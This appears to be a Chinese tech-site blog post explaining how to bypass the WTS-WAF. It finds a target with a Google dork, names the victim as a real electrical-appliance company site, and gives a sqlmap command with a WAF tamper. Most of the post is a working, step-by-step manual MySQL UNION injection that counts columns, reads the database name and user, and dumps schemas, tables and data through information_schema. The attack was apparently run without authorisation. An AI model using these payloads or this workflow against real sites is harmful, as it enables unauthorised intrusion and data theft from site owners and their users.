千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 网络安全 >

如何进行绕过WTS-WAF的分析

发表于:2024-11-30 作者:千家信息网编辑
千家信息网最后更新 2024年11月30日,本篇文章为大家展示了如何进行绕过WTS-WAF的分析,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。0x01.寻找目标inurl:.php?id= intext
千家信息网最后更新 2024年11月30日如何进行绕过WTS-WAF的分析

本篇文章为大家展示了如何进行绕过WTS-WAF的分析,内容简明扼要并且容易理解,绝对能使你眼前一亮,通过这篇文章的详细介绍希望你能有所收获。


0x01.寻找目标

inurl:.php?id= intext:电器

找到了一个电器公司的网站,随便测了测,发现有waf

这还不安排(找了点资料,貌似直接加号代替空格就可以,直接尝试)

0x02.操作

发现没有waf拦截了

资料还说了

sqlmap.py -u http://*/*.php?id=29 --tables --tamper space2plus.py

工具我尝试了发现无法开始

就这样子......

0x03.手注

http://*/*.php?id=1+and+1=1  #回显正常http://*/*.php?id=1+and+1=2  #回显错误说明存在注入http://*/*.php?id=1+order+by+15  #15回显错误http://*/*.php?id=1+order+by+14  #14回显正常说明有14个字段http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14  #-1让它错误然后执行后面

它回显了第2和第8

http://*/*.php?id=-1+union+select+1,database(),3,4,5,6,7,user(),9,10,11,12,13,14  #查询当前数据库信息和当前用户一些常见的函数version()  #显示数据库当前版本database() / schema()  #显示当前数据库名user() / system_user() / session_user() / current_user() / current_user()  #显示当前用户名称charset(str)  #返回字符串str的字符集collation(str)  #返回字符串str的字符排列方式

0x04.查数据

爆数据库

http://*/*.php?id=-1+union+select+1,group_concat(schema_name),3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1

它不能group_concat,那我就一个一个查了!http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+0,1 #从1开始取一个http://*/*.php?id=-1+union+select+1,schema_name,3,4,5,6,7,user(),9,10,11,12,13,14+from+information_schema.schemata+limit+1,1  #从2开始取一个

爆数据表

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,table_name,9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()+limit+0,1

爆数据

http://*/*.php?id=-1+union+select+1,2,3,4,5,6,7,字段名,9,10,11,12,13,14+表名+limit+0,1

总结:

1.工具跑不起就只能手注了

2.实践了下mysql的手注

上述内容就是如何进行绕过WTS-WAF的分析,你们学到知识或技能了吗?如果还想学到更多技能或者丰富自己的知识储备,欢迎关注行业资讯频道。

很赞哦!
数据 字符 数据库 错误 分析 内容 字段 字符串 工具 技能 用户 电器 知识 资料 尝试 简明 简明扼要 信息 公司 函数 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 计科专业考研网络安全 网络安全法 新闻发布会 网络安全与生活的联系 华为服务器业务出售许昌 广西警察学院网络技术 安卓链接数据库文件 北京触通无线网络技术有限公司 网络自由_网络安全 数据库无关属性定义 朵朵硕果互联网科技有限公司 sql数据库添加音乐 华硕服务器主板如何保修 数据库错删整个数据库 云服务器的作用 南山网络安全职业 双线服务器租用有什么好的介绍 思维导图SQL数据库设计 小程序放到别的服务器上安全 数据库先停监听 服务器端口映射为何第二天失效 曲面显示器做软件开发怎么样 网络安全与网络管理技术本章自测 VFP如何在数据库中复制表 新建图书数据库的操作语句 网络安全所涉及的内容 民国日报 数据库 sql初始数据库如何导入 计算机网络技术实习论文 谈谈如何做好网络安全防范工作 快速数据库

相关文章

0